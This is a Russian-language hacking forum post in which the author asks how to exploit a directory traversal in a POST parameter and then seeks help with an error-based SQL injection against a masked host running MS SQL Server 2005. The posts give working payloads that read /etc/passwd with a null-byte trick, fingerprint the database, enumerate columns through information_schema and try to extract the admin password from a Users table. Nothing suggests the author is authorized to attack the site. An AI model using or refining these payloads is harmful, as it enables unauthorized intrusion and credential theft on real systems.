Кто подскажет как раскрутить Directory Traversal уязвимость в POST
intPartnerType=&nextPage=1&partnerID=&SID=&thisPag e=../../../../../../../../../../etc/passwd%00.png
выдает
Добрый вечер господа!Требуется ваша помощь!Вообщем суть такова!
есть инъекция 2-й день ломаю голову ну никак не могу полность провести инъекцию я не когда этим не занимался!постараюсь полностью обьяснить свою проблему!
hxxp://хост/default.asp?idAccess=1808310+or+1=(@@version)--
получаю
система - Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86)
Nov 24 2008 13:01:59
Copyright (c) 1988-2005 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
нашел название БД и 100 таблиц в этой БД
получаю максимально 4-5 полей из каждой таблицы т.к видно фильтруется запятаю(,) пробывал заменить %2С и хец и чар не помогает
пример
hxxp://хост/default.asp?idAccess=1808310+or+1=(select+top+1+co lumn_name+from+information_schema.columns+where+ta ble_name='таблица'+and+column_name+not+in+( 'id','login','name'))--
поля вытаскивал таким способом
hxxp://хост/default.asp?idAccess=1808310+or+1=(select+top+1+co lumn_name+from+information_schema.columns+where+ta ble_name='таблица'+and+column_name+not+in+( 'id')+and+column_name+not+in+('login')+and+column_ name+not+in+('name'))--
если увеличиваю кол-во полей выскакивает ошибка что типа URl слишком длнный!
...
и еще нашел в одной таблице там полей мало было нашел поле password поле login но по такому запросу
hxxp://хост/default.asp?idAccess=1808310+or+1=(SELECT+TOP+1+ca st(password+as+nvarchar)+FROM+Users+where+login='a dmin')--
ошибки не возникает запрос проходит успешно ф-я convert не работает т.к там нужно использовать запятую и exec() так же не получется использовать!
вообщем HELPME!!!
Добавлено через 20 часов 10 минут
Тут есть кто люди????